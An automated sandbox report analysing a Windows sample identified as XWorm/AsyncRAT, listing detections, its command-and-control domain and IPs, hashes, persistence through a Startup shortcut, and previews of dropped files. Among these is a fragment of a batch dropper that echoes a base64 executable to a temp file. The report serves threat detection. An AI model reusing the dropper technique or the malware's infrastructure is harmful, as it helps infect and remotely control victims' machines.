                      x.exe66%ReversingLabsByteCode-MSIL.Trojan.Marsilia
                      x.exe56%VirustotalBrowse
                      x.exe100%AviraHEUR/AGEN.1306491
                      x.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\Hoodbyunlock.exe100%AviraTR/Agent.hcyxx
                      C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Agent.hcyxx
                      C:\ProgramData\Hoodbyunlock.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                      C:\ProgramData\Hoodbyunlock.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      C:\ProgramData\Hoodbyunlock.exe77%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\x.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      C:\Users\user\AppData\Local\Temp\x.exe77%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      bg.microsoft.map.fastly.net0%VirustotalBrowse
                      character-acquisitions.gl.at.ply.gg10%VirustotalBrowse
                      ip-api.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      character-acquisitions.gl.at.ply.gg100%Avira URL Cloudmalware
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
                      http://upx.sf.net0%Avira URL Cloudsafe
                      127.0.0.10%Avira URL Cloudsafe
                      https://github.com/dehoisted/Bat2Exeg0%Avira URL Cloudsafe
                      character-acquisitions.gl.at.ply.gg10%VirustotalBrowse
                      http://upx.sf.net0%VirustotalBrowse
                      https://github.com/dehoisted/Bat2Exeg0%VirustotalBrowse
                      http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
                      http://ip-api.com0%Avira URL Cloudsafe
                      https://github.com/dehoisted/Bat2Exe0%Avira URL Cloudsafe
                      127.0.0.10%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
                      https://github.com/dehoisted/Bat2Exe0%VirustotalBrowse
                      http://ip-api.com/line/?fields=hosting1%VirustotalBrowse
                      http://ip-api.com0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      		199.232.210.172
                      		truefalseunknown
                      character-acquisitions.gl.at.ply.gg
                      		147.185.221.17
                      		truetrueunknown
                      ip-api.com
                      		208.95.112.1
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      character-acquisitions.gl.at.ply.ggtrue
                      • 10%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      127.0.0.1true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ip-api.com/line/?fields=hostingfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://upx.sf.netAmcache.hve.11.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/dehoisted/Bat2Exegx.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ip-api.comx.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/dehoisted/Bat2Exex.exe, 00000000.00000002.2152277122.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      208.95.112.1
                      		ip-api.comUnited States
                      		53334TUT-ASUStrue
                      147.185.221.17
                      		character-acquisitions.gl.at.ply.ggUnited States
                      		12087SALSGIVERUStrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1504726
                      Start date and time:2024-09-05 11:14:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Critical Process Termination
                      Sample name:x.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@13/12@2/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 7
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:15:11API Interceptor1526312x Sleep call for process: x.exe modified
                      11:15:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      208.95.112.1UpdateMe.exeGet hashmaliciousUnknownBrowse
                      • ip-api.com/json/
                      Windows Security.exeGet hashmaliciousXWormBrowse
                      • ip-api.com/line/?fields=hosting
                      xclient.exeGet hashmaliciousXWormBrowse
                      • ip-api.com/line/?fields=hosting
                      XClient.exeGet hashmaliciousXWormBrowse
                      • ip-api.com/line/?fields=hosting
                      25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • ip-api.com/line/?fields=hosting
                      7ITEwXm2Pk.exeGet hashmaliciousAgentTeslaBrowse
                      • ip-api.com/line/?fields=hosting
                      hXpZpdaEVk.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • ip-api.com/line/?fields=hosting
                      BrowserUpdater.exeGet hashmaliciousUnknownBrowse
                      • ip-api.com/json/
                      raplica#U00e7#U00e3odecota#U00e7#U00e3o.exeGet hashmaliciousAgentTeslaBrowse
                      • ip-api.com/line/?fields=hosting
                      po89654.exeGet hashmaliciousAgentTeslaBrowse
                      • ip-api.com/line/?fields=hosting
                      147.185.221.17cougif6lqM.exeGet hashmaliciousDCRat, XWormBrowse
                        FUDE.bin.exeGet hashmaliciousXWormBrowse
                          system47.exeGet hashmaliciousXWormBrowse
                            setup.exeGet hashmaliciousXWormBrowse
                              APPoKkkk8h.exeGet hashmaliciousUnknownBrowse
                                hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                  file.exeGet hashmaliciousStealerium, SugarDump, XWormBrowse
                                    system.batGet hashmaliciousXWormBrowse
                                      cheeto.exeGet hashmaliciousXWormBrowse
                                        loader.exeGet hashmaliciousBinder HackTool, XWormBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ip-api.comUpdateMe.exeGet hashmaliciousUnknownBrowse
                                          • 208.95.112.1
                                          Windows Security.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          xclient.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                          • 51.77.64.70
                                          25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          7ITEwXm2Pk.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          hXpZpdaEVk.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          BrowserUpdater.exeGet hashmaliciousUnknownBrowse
                                          • 208.95.112.1
                                          raplica#U00e7#U00e3odecota#U00e7#U00e3o.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          bg.microsoft.map.fastly.nethttps://app.edu.buncee.com/buncee/67041126b8c5429abf86de62d6aaa0d9Get hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          https://rf-190.squarespace.com/sharepoint?e=ben.ly@wic.vic.gov.auGet hashmaliciousHTMLPhisherBrowse
                                          • 199.232.210.172
                                          https://email.dependent.best/maintenance.html?book=py.kim@hdel.co.krGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          RANGLANDLAW.xlsxGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          https://anoopmp9645.github.io/netflix.cloneGet hashmaliciousHTMLPhisherBrowse
                                          • 199.232.214.172
                                          http://warinice.ac.th/h/d/3dsece.phpGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          http://pub-ca22a10ffb7349aca30da700c49a0d87.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          https://url.au.m.mimecastprotect.com/s/g8u6CYWLwNc3rOroI9iVCx094pGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          http://pub-33cba1b1aa61453b9e89a582d09f5287.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          http://pub-5f55dcf46e2c4e018b4bf54f43757e34.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          character-acquisitions.gl.at.ply.ggcheeto.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.17
                                          loader.exeGet hashmaliciousBinder HackTool, XWormBrowse
                                          • 147.185.221.17

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SALSGIVERUSsilverclient.exeGet hashmaliciousUnknownBrowse
                                          • 147.185.221.22
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.20
                                          JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                                          • 147.185.221.21
                                          Stub.exeGet hashmaliciousUnknownBrowse
                                          • 147.185.221.22
                                          N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                          • 147.185.221.21
                                          N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                          • 147.185.221.21
                                          stub (5).batGet hashmaliciousUnknownBrowse
                                          • 147.185.221.19
                                          MicrosoftEdgeWebview2.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.20
                                          abomr3e.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.22
                                          SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.batGet hashmaliciousUnknownBrowse
                                          • 147.185.221.21
                                          TUT-ASUSUpdateMe.exeGet hashmaliciousUnknownBrowse
                                          • 208.95.112.1
                                          Windows Security.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          xclient.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                          • 208.95.112.2
                                          25QpgTIExG.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          7ITEwXm2Pk.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          hXpZpdaEVk.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          BrowserRecovery.exeGet hashmaliciousZTratBrowse
                                          • 208.95.112.1
                                          BrowserUpdater.exeGet hashmaliciousUnknownBrowse
                                          • 208.95.112.1

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Hoodbyunlock.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\x.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):210432
                                          Entropy (8bit):5.829643716053016
                                          Encrypted:false
                                          SSDEEP:3072:prm4sOjb48smI2WjbeYpX6Ou7atBBZ4uzDSEG2dCBVDtM5:pLsDbDpXKkZ4mSB2dCju
                                          MD5:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          SHA1:46599D94EDC83E67E6BDE3579F61028E2BEE7096
                                          SHA-256:59B203FCF387BFDE09A17D954C9281F5743B0D0EDB9C8D1FC481EB0165416FD0
                                          SHA-512:6D5E8AEB8A5139F31B0F8ED55655C0EB52B3E2589CF1E6EE3C13B06394CEBA72DA0DC5E01972386BD75B01D17C16E00D50FE2C1E3A2C4B2A5A6B70B0A753EC3D
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Hoodbyunlock.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Hoodbyunlock.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Hoodbyunlock.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 74%
                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.....................(......~*... ...@....@.. ....................................@.................................$*..W....@..^$........................................................................... ............... ..H............text........ ...................... ..`.rsrc...^$...@...&..................@..@.reloc...............4..............@..B................`*......H.......t^..........&.....................................................(....*.r...p*. .s..*..(....*.r%..p*. .:..*.s.........s.........s.........s.........*.rI..p*. ....*.rm..p*. .8F.*.r...p*. m.`.*.r...p*. .p.*.r...p*. S...*..((...*.r...p*. .b..*.r3..p*. r...*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(H...*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(*...~....-.(\...(N...~....o\...&.-.*.r-..p*. *p{.*.rQ..p*. ~.H.*.r...p*. MX%.*.r...p*. .x!.*.r...p*. E/..*.r...p*. 4.R.*.rO.

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_x.exe_32a3fb65533ab022fbe38ae48856885f5f5effa4_b9d7197b_8c0d4d83-efc1-473c-8805-0595f370cc4f\Report.wer

                                          Download File
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.4129133871120187
                                          Encrypted:false
                                          SSDEEP:384:wSrcDE81ihag8iFxcgzuiF5Y4lO8/fa7:zaE81ihacagzuiF5Y4lO8
                                          MD5:43F79019875610F9223926F94D748B63
                                          SHA1:9E7CF39A450AF22F86E6002E48E1746EF1A32E2B
                                          SHA-256:A7F499B33B9CF9A2BFD48B41C7844A4DE9A9B70D94F94FA95021C07D640D0101
                                          SHA-512:3419761938B0D6FA6DFD4940AD1531EB7147C4F7D1630E358C47710C80F89EBCE620073143E228C5FF1047F6BAA0C951A427056FB0610CAD523C5AB18A98B141
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.0.0.1.3.9.6.2.9.8.5.7.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.0.d.4.d.8.3.-.e.f.c.1.-.4.7.3.c.-.8.8.0.5.-.0.5.9.5.f.3.7.0.c.c.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.1.6.e.a.6.-.0.4.e.e.-.4.e.c.a.-.9.8.1.f.-.2.5.7.2.a.7.2.c.9.e.8.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.b.0.-.0.0.0.1.-.0.0.1.4.-.3.c.2.a.-.4.6.1.9.7.4.f.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.9.a.8.f.f.c.9.e.d.6.0.6.6.2.f.e.3.2.5.c.e.0.5.6.d.8.2.3.f.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.6.5.9.9.d.9.4.e.d.c.8.3.e.6.7.e.6.b.d.e.3.5.7.9.f.6.1.0.2.8.e.2.b.e.e.7.0.9.6.!.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.3././.1.5.:.2.3.:.3.2.:.3.0.!.0.!.x...e.x.e.....B.o.o.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER93E4.tmp.dmp

                                          Download File
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:Mini DuMP crash report, 16 streams, Thu Sep 5 09:16:37 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):625456
                                          Entropy (8bit):3.0868940562293776
                                          Encrypted:false
                                          SSDEEP:3072:58DAij8lb7tbc9YyaiDcSL8Ce1CCqp8m33+vQHRPW5GZRYFCxDP//bKLW4gRffh:5Rij8N7tYXX6qp8U3QQxesnpH2LWzxp
                                          MD5:F49FD3D222A0EEBFFB3469740CCF7EF8
                                          SHA1:2760C14B01921ED7A92C86CF9773CC55DAFBDE18
                                          SHA-256:95A0D5EAC722A31B9394DE41DD8B7DBCA191494254FA84CCC29BB6F55076D36D
                                          SHA-512:311908A56311998A19E7D9600B6A11F7EBBDD175571F26989621DC58D47BBEEF203275A7807417E27E67B1CFD278EF0D3A5607D1D4361DC2B328D021E7AA8332
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... ........v.f.........................(..........<....3......<....3.......P..............l.......8...........T...........pY...1...........J...........K..............................................................................eJ.......L......Lw......................T............v.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER981B.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):7216
                                          Entropy (8bit):3.72147725888785
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJcnZnAYk4j74t8Lpr589bwE3ifBQm:R6lXJcZnAYk24tBwkifj
                                          MD5:1574F6119083FE39D7112807F10ADB1D
                                          SHA1:9D5DC0656069A7822542E4EE126794700A5769FA
                                          SHA-256:C832EB2B3A5B7D8FADC025D7072A1E1F14DC65D7A889551DC93D36A30FC091F0
                                          SHA-512:DE55B3D49BF43464B30B97D5169235D970FA301D207FDC3F68F140860B78B7403BF9651600298C60639C24B603CA81BF4C1170F5D56D3F94FB7B705A62039022
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.0.8.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER984B.tmp.xml

                                          Download File
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4885
                                          Entropy (8bit):4.444670667654476
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsVJg771I9UXWpW8VYbYm8M4JpSFvyayq8vR3Z5NktM2d:uIjfvI7jm7V/JvaWNitM2d
                                          MD5:453B31D7F59EAF1D49670DB4FC05E76C
                                          SHA1:91D530B6AD754811B09E00135B96DE08F8F06A4A
                                          SHA-256:DCE0BB8AB7DF90CB97AF8AFA3FE14E0B129C8B8F0CAF7E2EFD838CC87667DB3C
                                          SHA-512:3BF05D963CDBF3F996DCDE21A63F7D3B1D9EC76DE14C26556F2FF6580AED0BC8A77BABF8B3DA09D63D0EF11CBE5F197D442AD02481AE0FD92A361CA75493985C
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486739" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\x.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):425
                                          Entropy (8bit):5.357964438493834
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                          MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                          SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                          SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                          SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                          C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat

                                          Download File
                                          Process:C:\Users\user\Desktop\x.exe
                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):345261
                                          Entropy (8bit):5.555493592376344
                                          Encrypted:false
                                          SSDEEP:6144:QO9RfQQb7q7TqZnbOLYILURiZulrrQ5dxStevxP593o04M3Bwv3+XEKGVs7Pd08Q:QOjQ2q7TqpbOLYILURiZulrrQ5dxSte+
                                          MD5:CCAEA73653A34AF5DD4FE25C5C1832BC
                                          SHA1:BCB90167312BC189AEDBAD3EFE09579B0F5204A1
                                          SHA-256:62A64C90FC235FAE4BB96FF0CE6E4A890A1F6BAFEE5EDCABBAD4E1F1AB587C8E
                                          SHA-512:229F43E706926B182D8F7ED2469D30D6D024B749516CEF67C79F4F30B54E04BC8DD3AB410389397246F0B031CD3AF06F8DD5B667CA77931736CF6DA8B4E7D8C0
                                          Malicious:true
                                          Preview:@echo off && title my men..@Echo off..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>%tmp%\x..echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g>>%tmp%\x..echo aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI7a9GUAAAAAAAAAAOAAAgELAQsAAA>>%tmp%\x..echo wBAAAoAgAAAAAAfioBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg>>%tmp%\x..echo AwAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACQqAQBXAA>>%tmp%\x..echo AAAEABAF4kAgAAAAAAAAAAAAAAAAAAAAAAAIADAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%tmp%\x..echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAA>>%tmp%\x..echo AAAAAAAAAAAC50ZXh0AAAAhAoBAAAgAAAADAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy>>%tmp%\x..echo YwAAAF4kAgAAQAEAACYCAAAOAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIADAA>>%tmp%\x..echo ACAAAANAMAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgKgEAAAAAAEgAAAAC>>%tmp%\x..echo AAUAdF4AALDLAAABAAAAJgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%tmp%\x..echo AAAAAAAAAAAA

                                          C:\Users\user\AppData\Local\Temp\x

                                          Download File
                                          Process:C:\Windows\System32\cmd.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):36864
                                          Entropy (8bit):4.7194566221075025
                                          Encrypted:false
                                          SSDEEP:768:bnqg2lK/b7YYeXegN56SIcaUC+BKqWLlCXXGjbLWWeNkiT6boP:bqNlwgNzINn+BKqwlCX2jfWWeNTP
                                          MD5:ACC558CEC5DB1188A689D6ECEF9E841E
                                          SHA1:DD2B5D0A530EDAF96FF96C14E01EF6E62B512EE1
                                          SHA-256:00806F2ABB2FC94683BBB1DF8E73CD9DB93967C55949E1F3B57DE9F7ED9B54B2
                                          SHA-512:7FC97132803DF1262B97DEF20D19AC92B4A79DC34E7E8C4D5DAEE87EF3CEEE2F63AF04BD734E668AE74CD13AE60B0D3BC417094D3864BE5B39FB905D9ED55F42
                                          Malicious:true
